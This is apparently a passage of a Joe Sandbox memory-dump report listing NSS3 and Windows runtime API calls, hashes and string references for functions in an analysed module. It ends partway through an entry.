Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 83b438f6b0c7fa2f9a64212cc719ec6fee54522012feed91a6e36d4d2fa29e94
Instruction ID: 37686538de4cb3a8a6b79b38700678b7f928160a97a225a0434183a44df3f4cc
Opcode Fuzzy Hash: 83b438f6b0c7fa2f9a64212cc719ec6fee54522012feed91a6e36d4d2fa29e94
Instruction Fuzzy Hash: CCC170B5A002199BDB10CF14CC80BDA7BB4BB4C318F1841A8D949A7741E775AED5DFD0

Function 6CADDC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CAE97C1,?,00000000,00000000,?,?,?,00000000,?,6CAC7F4A,00000000), ref: 6CADDC68

Part of subcall function 6CB00BE0: malloc.MOZGLUE(6CAF8D2D,?,00000000,?), ref: 6CB00BF8
Part of subcall function 6CB00BE0: TlsGetValue.KERNEL32(6CAF8D2D,?,00000000,?), ref: 6CB00C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CADDD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CADDE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CADDE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CADDE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CADDF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CADDF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CADDF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CADDFAA

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: d9c31b11255d820ad05686d39b9b65fe6dbc783c416e5111a12a9e5adb34120f
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 0D81B370E425428BFB104E59D8903597AB2EB64348F2A883AD559CAFE1DF74E4C4CE22

Function 6CAB3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CAB3C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6CAB3C94

Part of subcall function 6CAA95B0: TlsGetValue.KERNEL32(00000000,?,6CAC00D2,00000000), ref: 6CAA95D2
Part of subcall function 6CAA95B0: EnterCriticalSection.KERNEL32(?,?,?,6CAC00D2,00000000), ref: 6CAA95E7
Part of subcall function 6CAA95B0: PR_Unlock.NSS3(?,?,?,?,6CAC00D2,00000000), ref: 6CAA9605

PORT_NewArena_Util.NSS3(00000800), ref: 6CAB3CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CAB3CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CAB3CE1

Part of subcall function 6CAB3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CACAE42), ref: 6CAB30AA
Part of subcall function 6CAB3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAB30C7
Part of subcall function 6CAB3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CAB30E5
Part of subcall function 6CAB3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAB3116
Part of subcall function 6CAB3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAB312B
Part of subcall function 6CAB3090: PK11_DestroyObject.NSS3(?,?), ref: 6CAB3154
Part of subcall function 6CAB3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB317E

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 295fc0015b3aa095c7fb596eb09e8f69f01ad18ab4be548869c2b7fe4f7f70c3
Instruction ID: 6fb0408a20d097727a2e431d6f3ca51a72d7f7065e6addcfeb6e6eabc41df96c
Opcode Fuzzy Hash: 295fc0015b3aa095c7fb596eb09e8f69f01ad18ab4be548869c2b7fe4f7f70c3
Instruction Fuzzy Hash: 4A61C671A01200ABEF105F65DD41FAB76BDEF08748F0C4029FE45AAA52FB31D958D7A1

Function 6CAF3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6CAF3440: PK11_GetAllTokens.NSS3 ref: 6CAF3481
Part of subcall function 6CAF3440: PR_SetError.NSS3(00000000,00000000), ref: 6CAF34A3
Part of subcall function 6CAF3440: TlsGetValue.KERNEL32 ref: 6CAF352E
Part of subcall function 6CAF3440: EnterCriticalSection.KERNEL32(?), ref: 6CAF3542
Part of subcall function 6CAF3440: PR_Unlock.NSS3(?), ref: 6CAF355B

TlsGetValue.KERNEL32 ref: 6CAF3D8B
EnterCriticalSection.KERNEL32(?), ref: 6CAF3D9F
PR_Unlock.NSS3(?), ref: 6CAF3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6CAF3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CAF3E4F

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

TlsGetValue.KERNEL32 ref: 6CAF3E97
EnterCriticalSection.KERNEL32(?), ref: 6CAF3EAB
PR_Unlock.NSS3(?), ref: 6CAF3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6CAF3EEE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: 99997039e3e6a3a11f341d3389b6fdac835ea82e29450d9903a6ca74fe166077
Instruction ID: 15d52af823a88811026edd24fbc91e8d68ce5d8eead70e91f3d09f98be0e5d02
Opcode Fuzzy Hash: 99997039e3e6a3a11f341d3389b6fdac835ea82e29450d9903a6ca74fe166077
Instruction Fuzzy Hash: 5E518C75A022009FDB11AF68DC4476A73F4EF45318F094528EEA957B11EB31E8D6C7D2

Function 6CAA2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(8771BE33), ref: 6CAA2C5D

Part of subcall function 6CB00D30: calloc.MOZGLUE ref: 6CB00D50
Part of subcall function 6CB00D30: TlsGetValue.KERNEL32 ref: 6CB00D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CAA2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAA2CE0

Part of subcall function 6CAA2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CAA2CDA,?,00000000), ref: 6CAA2E1E
Part of subcall function 6CAA2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CAA2E33
Part of subcall function 6CAA2E00: TlsGetValue.KERNEL32 ref: 6CAA2E4E
Part of subcall function 6CAA2E00: EnterCriticalSection.KERNEL32(?), ref: 6CAA2E5E
Part of subcall function 6CAA2E00: PL_HashTableLookup.NSS3(?), ref: 6CAA2E71
Part of subcall function 6CAA2E00: PL_HashTableRemove.NSS3(?), ref: 6CAA2E84
Part of subcall function 6CAA2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CAA2E96
Part of subcall function 6CAA2E00: PR_Unlock.NSS3 ref: 6CAA2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CAA2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CAA2D3F
free.MOZGLUE(00000000), ref: 6CAA2D73
CERT_DestroyCertificate.NSS3(?), ref: 6CAA2DB8
free.MOZGLUE ref: 6CAA2DC8

Part of subcall function 6CAA3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAA3EC2
Part of subcall function 6CAA3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAA3ED6
Part of subcall function 6CAA3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAA3EEE
Part of subcall function 6CAA3E60: PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAA3F02
Part of subcall function 6CAA3E60: PL_FreeArenaPool.NSS3 ref: 6CAA3F14
Part of subcall function 6CAA3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAA3F27

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 8006aabc2600326ab4fba165884bf20c80fce0cc78c11098103dc0f005208f32
Instruction ID: 7be230b2d76075ca2368e2a7f0be1ef48fc23da216399f074744d5c1cf02a1f5
Opcode Fuzzy Hash: 8006aabc2600326ab4fba165884bf20c80fce0cc78c11098103dc0f005208f32
Instruction Fuzzy Hash: 7D51E2716043119FEB119FA6DC45B6B77E5EF84308F18062CEC5983B11E731E8AACB92

Function 6CAC8F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAC8FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAC8FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAC8FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CAC9013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAC9042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAC905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CAC9073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAC90EC

Part of subcall function 6CA90F00: PR_GetPageSize.NSS3(6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F1B
Part of subcall function 6CA90F00: PR_NewLogModule.NSS3(clock,6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAC9111

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: c52c55d740f5d170a3a5338458e0aa6dae19825a213365c1fa50b4aca1db547c
Instruction ID: d427f79ae1730994338e96eb15a0bb2fec5aa16afd9fc4805d0de01515b25d3f
Opcode Fuzzy Hash: c52c55d740f5d170a3a5338458e0aa6dae19825a213365c1fa50b4aca1db547c
Instruction Fuzzy Hash: 73517774B046148FDB00EF78C588299BBF4BF09318F0A4569DC459B706EB31E8C9CB82

Function 6CAA7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAA40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CAA3F7F,?,00000055,?,?,6CAA1666,?,?), ref: 6CAA40D9
Part of subcall function 6CAA40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CAA1666,?,?), ref: 6CAA40FC
Part of subcall function 6CAA40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CAA1666,?,?), ref: 6CAA4138

PR_GetCurrentThread.NSS3 ref: 6CAA7CFD

Part of subcall function 6CB69BF0: TlsGetValue.KERNEL32(?,?,?,6CBB0A75), ref: 6CB69C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6CBC9030), ref: 6CAA7D1B

Part of subcall function 6CAFFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CAA1A3E,00000048,00000054), ref: 6CAFFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6CBC9048), ref: 6CAA7D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CAA7D50
PR_GetCurrentThread.NSS3 ref: 6CAA7D61
PORT_ArenaMark_Util.NSS3(?), ref: 6CAA7D7D
free.MOZGLUE(?), ref: 6CAA7D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CAA7DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6CAA7E19

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: aa8aae17825fe2653461d61f6e978149299b974dc20be8a8369385160c9872fd
Instruction ID: acd7b6065d29e481739b182cf815d565c408ce6f43d8feae901bc55895c46999
Opcode Fuzzy Hash: aa8aae17825fe2653461d61f6e978149299b974dc20be8a8369385160c9872fd
Instruction Fuzzy Hash: 7241BB71A001159BDB009FA9DC41BAF37E8AF5435CF090164EC19E7755E730ED9ACBA1

Function 6CAB7EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6CAB80DD), ref: 6CAB7F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CAB80DD), ref: 6CAB7F36
free.MOZGLUE(?,?,?,6CAB80DD), ref: 6CAB7F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CAB80DD), ref: 6CAB7F5D
DeleteCriticalSection.KERNEL32(?,6CAB80DD), ref: 6CAB7F94
free.MOZGLUE(?), ref: 6CAB7F9B
PR_SetError.NSS3(FFFFE08B,00000000,6CAB80DD), ref: 6CAB7FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CAB80DD), ref: 6CAB7FE6
free.MOZGLUE(?,6CAB80DD), ref: 6CAB802D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: a0c1c5707a078ca0b5eb8979d2cee298bb29f274905ac954fae50a18ca82f76d
Instruction ID: 4ad820499a62635c96592892747ac6bfc798b8ca1829ea1e03004e328b20d16f
Opcode Fuzzy Hash: a0c1c5707a078ca0b5eb8979d2cee298bb29f274905ac954fae50a18ca82f76d
Instruction Fuzzy Hash: D4412971B051008BDB10DFB89898A4A37BDAB47358F16022DE51AE7B41D772D889CBA1

Function 6CAFFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAFFF00

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6CAFFF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CAFFF26
PORT_ArenaMark_Util.NSS3(?), ref: 6CAFFF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CAFFF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CAFFF8C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: 5c2b356482b0bf0e932f6967e2980488770c447b753fc09752db910db2b9551a
Instruction ID: ae8235622735ff01282f9407212c24e40cf4ccce3051fc2a0733574d4b1bcc93
Opcode Fuzzy Hash: 5c2b356482b0bf0e932f6967e2980488770c447b753fc09752db910db2b9551a
Instruction Fuzzy Hash: 763123B2A013969BF7208E589C40B9A7AE8AF4234CF18413DFD2897B50FB70D955C7D1

Function 6CB04DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CB0536F,00000022,?,?,00000000,?), ref: 6CB04E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CB04F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CB04F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CB04FAE
free.MOZGLUE(?), ref: 6CB04FC8

Strings

%s=%s, xrefs: 6CB04F89
%s=%c%s%c, xrefs: 6CB04FA9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: ff5bd309c07da465b5a9939adc7d8510026e10589b40b7c384bde66ee0514e86
Instruction ID: e3aad3424cb0c7a1e8203f174ebd8fb99a790e1f3458c362f70a2537bf8c1718
Opcode Fuzzy Hash: ff5bd309c07da465b5a9939adc7d8510026e10589b40b7c384bde66ee0514e86
Instruction Fuzzy Hash: C9516871B051C68BEF05CA69C4907FF7FF5EF62308F288165E894A7B41D32598098FA2

Function 6CA47D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA47E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA47E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CA47EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA47F2E

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA47ED8, 6CA47F08, 6CA47F19
%s at line %d of [%.10s], xrefs: 6CA47EE7, 6CA47F28
database corruption, xrefs: 6CA47EE2, 6CA47F23

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: ec9fe4ead2666739855b02652f8c805e03f416d7698af3fc4b9ee186715170e4
Instruction ID: 2571ac165c61d9f613a8dc27e0d95e68f9b8b5fbf7ca3fadc6fd426e7c91cea2
Opcode Fuzzy Hash: ec9fe4ead2666739855b02652f8c805e03f416d7698af3fc4b9ee186715170e4
Instruction Fuzzy Hash: 7161D374A042859FDB05CF25C891FAA3772BF45318F1985A8EC099FB52D731EC95CBA0

Function 6CA2FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

